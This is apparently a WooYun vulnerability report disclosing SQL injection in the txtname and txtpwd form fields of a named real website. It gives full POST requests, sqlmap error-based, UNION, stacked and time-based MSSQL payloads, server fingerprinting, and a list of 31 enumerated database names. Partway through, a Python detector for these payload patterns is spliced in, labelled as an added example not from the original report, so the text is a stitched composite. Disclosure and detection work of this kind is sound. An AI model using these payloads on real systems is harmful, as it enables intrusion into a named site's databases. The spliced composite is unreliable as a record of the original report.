WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, browse online -------- http://drop.zone.ci/
2015-08-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public.
2015-09-19: The vendor has proactively ignored the vulnerability; details are now disclosed to the public.
Injection points:
POST /bbs/bbslist.aspx?t=17 HTTP/1.1
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Button3=%e7%99%bb%e5%bd%95&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtcontent=1&txtname=t3qA5gbx&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAK6h8yiDgLh4%2bm2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd%2b7q4BwLWlM%2bbAgLz0oe%2bAQLppJj%2bCAKQ2fLiCXD368ohuWU92emfv61CjNe6Q2ln&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFgYCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIOD2QWBgICDw8WAh8BaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAmZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMTuInKqtm%2blpCF6Jw9xgIuMGqvwc
The txtname and txtpwd parameters are injectable.
POST /bbs/forget.aspx HTTP/1.1
Content-Length: 628
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Button1=%e6%8f%90%e4%ba%a4&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtname=oSdzP2Kk&__EVENTVALIDATION=/wEWCALDwYzWAQLh4%2bm2CQKrjZKaDwLEhISACwKM54rGBgLz0oe%2bAQLppJj%2bCAKQ2fLiCXih7CD4gBIs2hQoGO8oq2YWm4Pe&__VIEWSTATE=/wEPDwULLTEyNjY2MjAyMzkPZBYCAgIPZBYCAgcPZBYGAgIPDxYCHgdWaXNpYmxlaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMWYkSpQqEeji/w4Vct0R0YW7OwlF
Injection process for the txtname parameter:
sqlmap identified the following injection points with a total of 47 HTTP(s) requests:
---
Parameter: txtname (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' AND 7666=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7666=7666) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113))) AND 'bOov'='bOov&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(69)+CHAR(72)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(105)+CHAR(80)+CHAR(108)+CHAR(69)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113),NULL-- &txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx'; WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$ImageButton1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' WAITFOR DELAY '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
---
[01:19:24] [INFO] testing Microsoft SQL Server
[01:19:24] [INFO] confirming Microsoft SQL Server
[01:19:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
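The sqlmap output above shows four technique families landing in the same txtname field of an ASP.NET form: error-based (CONVERT(INT,(SELECT ...)), UNION SELECT NULL padding, stacked WAITFOR DELAY, and an inline WAITFOR DELAY time-based probe. The following is an added example, not code from the original report: a small log-side detector that URL-decodes a form body the way the application would and matches each watched parameter against those four families. The request bodies are constructed here from the parameter names the report shows; the log format (path, body) pairs, the WATCHED tuple and the function names are assumptions for the example.

```python
"""Added example (not from the WooYun report): flag the MSSQL injection
technique families sqlmap reported against the txtname/txtpwd parameters
by inspecting decoded POST bodies from an access log."""
import re
from urllib.parse import parse_qs, urlencode

# One regex per technique family from the sqlmap output, applied to the
# URL-decoded parameter value. The stacked and time-based families both use
# WAITFOR DELAY; the ';' statement separator is what tells them apart.
SIGNATURES = {
    "error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+NULL\b", re.I),
    "stacked queries": re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    "time-based blind": re.compile(r"'\s+WAITFOR\s+DELAY\b", re.I),
}

# Parameters the report identifies as injectable (assumed watch-list).
WATCHED = ("txtname", "txtpwd")


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: value}.

    ASP.NET forms carry many fields (__VIEWSTATE, ge1$txtname, ...) and empty
    submit-button fields such as ge1$ImageButton1; keep_blank_values keeps
    those so the decoded form mirrors what the server actually received.
    """
    parsed = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def classify(value: str) -> list:
    """Return the technique families whose signature the decoded value matches."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]


def scan_request(path: str, body: str) -> list:
    """Return (path, param, techniques) for every watched parameter that matches."""
    form = decode_form(body)
    hits = []
    for param in WATCHED:
        techniques = classify(form.get(param, ""))
        if techniques:
            hits.append((path, param, techniques))
    return hits


def scan_log(entries) -> list:
    """Scan an iterable of (path, body) pairs in order and collect all hits."""
    hits = []
    for path, body in entries:
        hits.extend(scan_request(path, body))
    return hits


def _form(**fields) -> str:
    """URL-encode a form body the way a browser does (constructed test data)."""
    return urlencode(fields)


# Constructed sample traffic: one benign login, then one request per technique
# family, using the form parameter names and page paths from the report.
SAMPLE_LOG = [
    ("/bbs/bbslist.aspx?t=17", _form(txtname="alice", txtpwd="hunter2",
                                     txtcontent="hi", txttitle="Mr.")),
    ("/bbs/bbslist.aspx?t=17", _form(
        txtname="t3qA5gbx' AND 7666=CONVERT(INT,(SELECT CHAR(113))) AND 'bOov'='bOov",
        txtpwd="1")),
    ("/bbs/bbslist.aspx?t=17", _form(
        txtname="t3qA5gbx' UNION ALL SELECT NULL,NULL,NULL-- ", txtpwd="1")),
    ("/bbs/bbslist.aspx?t=17", _form(
        txtname="t3qA5gbx'; WAITFOR DELAY '0:0:5'--", txtpwd="1")),
    ("/bbs/forget.aspx", _form(txtname="oSdzP2Kk' WAITFOR DELAY '0:0:5'--")),
]

if __name__ == "__main__":
    for path, param, techniques in scan_log(SAMPLE_LOG):
        print(f"{path} {param}: {', '.join(techniques)}")
```

Matching runs on the decoded value rather than on the raw body so that percent-encoded and plus-encoded spaces (the form in the report is `application/x-www-form-urlencoded`) do not defeat the whitespace classes in the patterns; the benign first entry produces no hit, and each remaining entry is attributed to exactly one family.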
Privileges:
Databases:
available databases [31]:
[*] a1014135557
[*] AnimationSite
[*] anli
[*] BaiCaoData
[*] ChiHuoData
[*] CimatronData
[*] CompanyData
[*] CusDB
[*] dfjrdb
[*] DomZoneData
[*] doulqdb
[*] flowershop
[*] futureData
[*] hao1317-bd
[*] huayanse
[*] kangjie
[*] LeYuanData
[*] LoginSystem
[*] master
[*] model
[*] msdb
[*] NanChangMeiShiData
[*] public
[*] rowsun
[*] ShopData
[*] SmallHouse
[*] tempdb
[*] Virgo
[*] yidongyun
[*] yinhe
[*] ZiTengData
List
Only the vulnerability was tested; no data was dumped.
Unable to contact the vendor, or the vendor actively refused.